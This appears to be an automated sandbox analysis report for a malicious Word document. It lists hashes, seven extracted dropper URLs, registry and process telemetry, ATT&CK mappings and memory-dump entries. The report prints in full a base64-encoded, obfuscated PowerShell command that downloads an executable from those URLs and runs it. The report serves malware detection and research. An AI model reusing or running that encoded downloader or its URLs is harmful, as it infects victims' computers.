235c1596d946f273671bd85c3edbd0a70adc0108e4e4c8c4b67c9fbd4665e4a3

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
20/09/2024, 05:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ececa7f4d7c922fa9707e1d52f42cf92_JaffaCakes118.doc
Size

201KB
MD5

ececa7f4d7c922fa9707e1d52f42cf92
SHA1

743ca04fff27e4f1b92502165d1093c7678d1525
SHA256

235c1596d946f273671bd85c3edbd0a70adc0108e4e4c8c4b67c9fbd4665e4a3
SHA512

333e148688054dcbba8ef5ccf707144bcaec66a801900c9422828e45e080baa78ea2134466e0a8e40fc23f559ce20dc89ecb9d6c4af2b7273f6ed0beda30e036
SSDEEP

3072:dUqJ1NgsA8k/gvh0NZ0lGX1nZ7ZqpSgKsiEHE+b64JE:dBtgVIveNZvn0zKjEkc6cE

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://bavhome.com/wp-content/td/

exe.dropper

http://hercinovic.com/cgi-bin/mZt/

exe.dropper

https://jeffdahlke.com/css/3u/

exe.dropper

http://calledtochange.org/CalledtoChange/V/

exe.dropper

http://daoisthealing.com/cgi-bin/c/

exe.dropper

https://scyzm.net/wp-content/j/

exe.dropper

http://www.bismarjeparamebel.com/u/pCp/

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
5	2620	POwersheLL.exe
7	2620	POwersheLL.exe
9	2620	POwersheLL.exe
11	2620	POwersheLL.exe
12	2620	POwersheLL.exe
14	2620	POwersheLL.exe
16	2620	POwersheLL.exe
18	2620	POwersheLL.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POwersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{BDFB0535-9033-42FB-AF5A-74D774EBDEA9}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{BDFB0535-9033-42FB-AF5A-74D774EBDEA9}\2.0\0\win32	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BDFB0535-9033-42FB-AF5A-74D774EBDEA9}\2.0\FLAGS	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BDFB0535-9033-42FB-AF5A-74D774EBDEA9}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\TypeLib\{BDFB0535-9033-42FB-AF5A-74D774EBDEA9}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1724	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2620	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2620	POwersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1724	WINWORD.EXE
1724	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1724 wrote to memory of 1716	1724	WINWORD.EXE	35
PID 1724 wrote to memory of 1716	1724	WINWORD.EXE	35
PID 1724 wrote to memory of 1716	1724	WINWORD.EXE	35
PID 1724 wrote to memory of 1716	1724	WINWORD.EXE	35

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ececa7f4d7c922fa9707e1d52f42cf92_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1724
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABCADYAdAAwAGcAZwBnAD0AKAAoACcAUABhACcAKwAnAHcAcABnACcAKwAnAHYAJwApACsAJwBhACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdQBTAGUAcgBwAFIAbwBGAGkATABlAFwAeABfAHgANQBWAFoAcgBcAEYAOABCAFkAZQBhAE8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAYABVAGAAUgBpAHQAeQBgAHAAcgBvAHQATwBjAG8AbAAiACAAPQAgACgAKAAnAHQAbABzADEAJwArACcAMgAnACsAJwAsACcAKQArACgAJwAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxADEALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABIAHUAcgBwAGgAdwBpACAAPQAgACgAKAAnAFkAeQAnACsAJwB4ACcAKQArACcAbgBvACcAKwAnADMAJwApADsAJABMAGIAagB5ADAAZAAxAD0AKAAoACcARwBnAHgAJwArACcAbgAnACkAKwAoACcAbQBkACcAKwAnAGoAJwApACkAOwAkAEQAcwA2ADcANgBlAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0AWABfAHgAJwArACcANQB2AHoAcgB7ADAAfQBGACcAKwAnADgAYgB5AGUAYQBvAHsAMAB9ACcAKQAgACAALQBGAFsAYwBoAEEAUgBdADkAMgApACsAJABIAHUAcgBwAGgAdwBpACsAKAAoACcALgAnACsAJwBlAHgAJwApACsAJwBlACcAKQA7ACQAUwA1ADMAaQB1AGMAYwA9ACgAJwBQACcAKwAnADcANgAnACsAKAAnADEAJwArACcAcQBuAGIAJwApACkAOwAkAFYAeQBlAHkAcgBiAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAGIAYwBsAEkAZQBOAFQAOwAkAFoAXwBoADcAXwB4AGEAPQAoACgAJwBoACcAKwAnAHQAdABwADoALwAvACcAKwAnAGIAJwArACcAYQB2AGgAJwApACsAKAAnAG8AJwArACcAbQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAbgB0AC8AJwArACcAdAAnACkAKwAnAGQAJwArACcALwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBoAGUAJwArACcAcgBjAGkAbgBvAHYAJwArACcAaQBjACcAKwAnAC4AJwArACcAYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYwBnACcAKwAnAGkALQBiACcAKwAnAGkAbgAvACcAKQArACcAbQAnACsAKAAnAFoAdAAnACsAJwAvACoAaAAnACsAJwB0AHQAJwArACcAcABzADoALwAnACkAKwAnAC8AagAnACsAKAAnAGUAJwArACcAZgBmACcAKQArACcAZAAnACsAKAAnAGEAJwArACcAaABsACcAKQArACgAJwBrAGUAJwArACcALgAnACkAKwAnAGMAbwAnACsAKAAnAG0ALwBjAHMAJwArACcAcwAnACkAKwAnAC8AMwAnACsAKAAnAHUALwAnACsAJwAqAGgAdAAnACkAKwAoACcAdABwACcAKwAnADoALwAvACcAKQArACgAJwBjAGEAJwArACcAbAAnACkAKwAoACcAbAAnACsAJwBlAGQAJwApACsAKAAnAHQAbwAnACsAJwBjAGgAYQBuACcAKwAnAGcAZQAuAG8AJwApACsAJwByACcAKwAnAGcAJwArACgAJwAvAEMAYQAnACsAJwBsACcAKQArACcAbABlACcAKwAoACcAZAB0ACcAKwAnAG8AQwBoAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAC8AJwApACsAJwBWAC8AJwArACcAKgAnACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AJwApACsAJwBkAGEAJwArACgAJwBvAGkAcwB0ACcAKwAnAGgAZQBhACcAKQArACgAJwBsACcAKwAnAGkAbgBnAC4AYwBvAG0ALwAnACkAKwAnAGMAZwAnACsAKAAnAGkALQBiAGkAbgAnACsAJwAvAGMALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AJwApACsAKAAnAHMAJwArACcAYwB5ACcAKQArACgAJwB6ACcAKwAnAG0ALgBuAGUAdAAnACsAJwAvACcAKQArACcAdwAnACsAJwBwACcAKwAnAC0AJwArACcAYwBvACcAKwAoACcAbgAnACsAJwB0AGUAJwArACcAbgB0AC8AagAnACsAJwAvACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAOgAnACsAJwAvACcAKQArACgAJwAvAHcAJwArACcAdwAnACkAKwAoACcAdwAuACcAKwAnAGIAaQBzAG0AJwApACsAJwBhAHIAJwArACgAJwBqAGUAcABhAHIAYQAnACsAJwBtACcAKwAnAGUAJwArACcAYgBlAGwALgAnACsAJwBjAG8AbQAvAHUAJwApACsAKAAnAC8AJwArACcAcABDAHAAJwApACsAJwAvACcAKQAuACIAUwBgAHAATABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGcAZAA5ADgAdABpAD0AKAAoACcAVwAwACcAKwAnAG4AagAnACkAKwAoACcAdABoACcAKwAnAHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAGcAZgB1AG4AYQB3ACAAaQBuACAAJABaAF8AaAA3AF8AeABhACkAewB0AHIAeQB7ACQAVgB5AGUAeQByAGIAYwAuACIARABvAGAAVwBgAE4ATABPAEEAZABmAGkAYABMAEUAIgAoACQAVQBnAGYAdQBuAGEAdwAsACAAJABEAHMANgA3ADYAZQBvACkAOwAkAFIAbQA5AHUAdwB0AGUAPQAoACcAWgAnACsAJwA2ACcAKwAoACcAYwBjACcAKwAnAGkAYQB3ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEQAcwA2ADcANgBlAG8AKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAzADcAOQA5ADEAKQAgAHsALgAoACcASQBuAHYAbwBrAGUAJwArACcALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAoACQARABzADYANwA2AGUAbwApADsAJABFAGQAZwBfAG0AbwBoAD0AKAAnAEEAJwArACcAbgAnACsAKAAnAHcAMQAnACsAJwA0ADcAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAVABiAGUAcAByADUAMgA9ACgAKAAnAFMAJwArACcAMABjACcAKQArACgAJwBxAGYAdAAnACsAJwA3ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAGUAbQBlAHMAZABuAD0AKAAoACcAVAAwAHcAZgAnACsAJwBzACcAKQArACcAeQBnACcAKQA=
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
a5e39d9fd8ec471cf3c9675ede29abd8

SHA1
361b4e471e2b303e7508aaa91c55a92ece1f18c2

SHA256
36974b58a9228d27c9b1c5ed12557e3e3522b9898e6400b2dd3d0ddfdb47f2d5

SHA512
2b3baf0ec3485bff30d9963a21d06fba107cc507af19b1efdeb81ccffcc7350fcc86947c63384faea43761ae3d7909991286fe61e505cb72bd4532301fc6dbdf

Download Submit
memory/1724-42-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-40-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-39-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-5-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-7-0x0000000005D10000-0x0000000005E10000-memory.dmp

Filesize
1024KB

Download
memory/1724-8-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-28-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-29-0x0000000005A20000-0x0000000005B20000-memory.dmp

Filesize
1024KB

Download
memory/1724-20-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-19-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-18-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-17-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-15-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-16-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-14-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-13-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-12-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-43-0x0000000005A20000-0x0000000005B20000-memory.dmp

Filesize
1024KB

Download
memory/1724-46-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-0-0x000000002FC31000-0x000000002FC32000-memory.dmp

Filesize
4KB

Download
memory/1724-2-0x000000007120D000-0x0000000071218000-memory.dmp

Filesize
44KB

Download
memory/1724-41-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-6-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-21-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-78-0x000000007120D000-0x0000000071218000-memory.dmp

Filesize
44KB

Download
memory/1724-77-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1724-38-0x0000000005A20000-0x0000000005B20000-memory.dmp

Filesize
1024KB

Download
memory/1724-37-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-33-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-32-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-31-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-30-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-11-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-10-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-9-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-54-0x000000007120D000-0x0000000071218000-memory.dmp

Filesize
44KB

Download
memory/1724-55-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-56-0x0000000005A20000-0x0000000005B20000-memory.dmp

Filesize
1024KB

Download
memory/1724-57-0x0000000000490000-0x0000000000590000-memory.dmp

Filesize
1024KB

Download
memory/1724-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2620-52-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/2620-53-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download